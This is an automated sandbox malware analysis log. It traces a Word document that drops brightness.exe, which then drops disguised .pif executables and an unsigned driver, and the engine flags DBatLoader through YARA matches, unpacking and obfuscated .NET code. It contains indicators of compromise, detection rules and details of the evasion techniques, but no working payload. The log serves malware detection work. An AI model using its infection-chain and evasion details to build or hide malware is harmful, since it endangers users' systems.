          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: mscoree.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: wldp.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: amsi.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: userenv.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: profapi.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: version.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: gpapi.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: cryptsp.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rsaenh.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: cryptbase.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: windows.storage.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rasapi32.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rasman.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rtutils.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: mswsock.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: winhttp.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: iphlpapi.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: dhcpcsvc6.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: dhcpcsvc.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: dnsapi.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: winnsi.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rasadhlp.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: fwpuclnt.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: secur32.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: sspicli.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: schannel.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: mskeyprotect.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ntasn1.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ncrypt.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ncryptsslp.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: dpapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: version.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: uxtheme.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: url.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieframe.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: iertutil.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: netapi32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: userenv.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winhttp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: wkscli.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: netutils.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: amsi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: smartscreenps.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: kernel.appcore.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winmm.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: wininet.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sspicli.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: windows.storage.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: wldp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: profapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieproxy.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieproxy.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieproxy.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mssip32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mssip32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mssip32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mswsock.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: iphlpapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winnsi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??????????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???e???????????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???e???????????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: tquery.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: cryptdll.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: spp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vssapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vsstrace.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: spp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vssapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vsstrace.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mssip32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: endpointdlp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: endpointdlp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: endpointdlp.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.0000000020649000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846070015.000000007F410000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.0000000020508000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1976468099.0000000032464000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2072252048.000000001EAD6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1847028273.0000000021501000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1847028273.00000000214D2000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.0000000020649000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846070015.000000007F410000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.0000000020508000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1963965217.0000000000691000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1963965217.0000000000662000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000003.2043487630.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000003.2043487630.00000000005F7000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 8.2.npratlsN.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 14.2.npratlsN.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 18.2.npratlsN.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 8.2.npratlsN.pif.400000.2.unpack
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 14.2.npratlsN.pif.400000.1.unpack
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 18.2.npratlsN.pif.400000.1.unpack
          Yara detected DBatLoader
          Source: Yara matchFile source: 4.2.brightness.exe.22765a8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.brightness.exe.22765a8.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.brightness.exe.2900000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.3047709158.0000000000BE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1900364042.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000001.2046118520.0000000000BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1854703375.0000000002276000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3047750977.0000000000BE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000001.1967244493.0000000000BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: npratlsN.pif.4.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02918798 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02918798
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029032FC push eax; ret 4_2_02903338
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292D2FC push 0292D367h; ret 4_2_0292D35F
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290635A push 029063B7h; ret 4_2_029063AF
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290635C push 029063B7h; ret 4_2_029063AF
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292D0AC push 0292D125h; ret 4_2_0292D11D
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292D1F8 push 0292D288h; ret 4_2_0292D280
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292D144 push 0292D1ECh; ret 4_2_0292D1E4
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029186B8 push 029186FAh; ret 4_2_029186F2
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02906736 push 0290677Ah; ret 4_2_02906772
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02906738 push 0290677Ah; ret 4_2_02906772
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290C4EC push ecx; mov dword ptr [esp], edx4_2_0290C4F1
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290D520 push 0290D54Ch; ret 4_2_0290D544
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290CB6C push 0290CCF2h; ret 4_2_0290CCEA
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291788C push 02917909h; ret 4_2_02917901
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029168C6 push 02916973h; ret 4_2_0291696B
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029168C8 push 02916973h; ret 4_2_0291696B
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290C9CE push 0290CCF2h; ret 4_2_0290CCEA
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291E9E8 push ecx; mov dword ptr [esp], edx4_2_0291E9ED
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02918910 push 02918948h; ret 4_2_02918940
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291A917 push 0291A950h; ret 4_2_0291A948
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291A918 push 0291A950h; ret 4_2_0291A948
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291890E push 02918948h; ret 4_2_02918940
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02912EE0 push 02912F56h; ret 4_2_02912F4E
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292BFA0 push 0292C1C8h; ret 4_2_0292C1C0
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02912FEB push 02913039h; ret 4_2_02913031
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02912FEC push 02913039h; ret 4_2_02913031
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02915DFC push ecx; mov dword ptr [esp], edx4_2_02915DFE
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0041C40C push cs; iretd 8_2_0041C4E2
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_00423149 push eax; ret 8_2_00423179
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0041C50E push cs; iretd 8_2_0041C4E2
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004231C8 push eax; ret 8_2_00423179
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'iGl1TqUpTloA8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

          Persistence and Installation Behavior

          barindex
          Drops PE files with a suspicious file extension
          Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\npratlsN.pifJump to dropped file
          Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\Nsltarpn.PIFJump to dropped file
          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEExecutable created and started: C:\Windows\SysWOW64\brightness.exeJump to behavior
          Sample is not signed and drops a device driver
          Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFFile created: C:\Windows \SysWOW64\truesight.sys
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFFile created: C:\Windows \SysWOW64\truesight.sys
          Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\npratlsN.pifJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to dropped file
          Source: C:\Windows\SysWOW64\brightness.exeFile created: C:\Users\Public\Libraries\Nsltarpn.PIFJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to dropped file
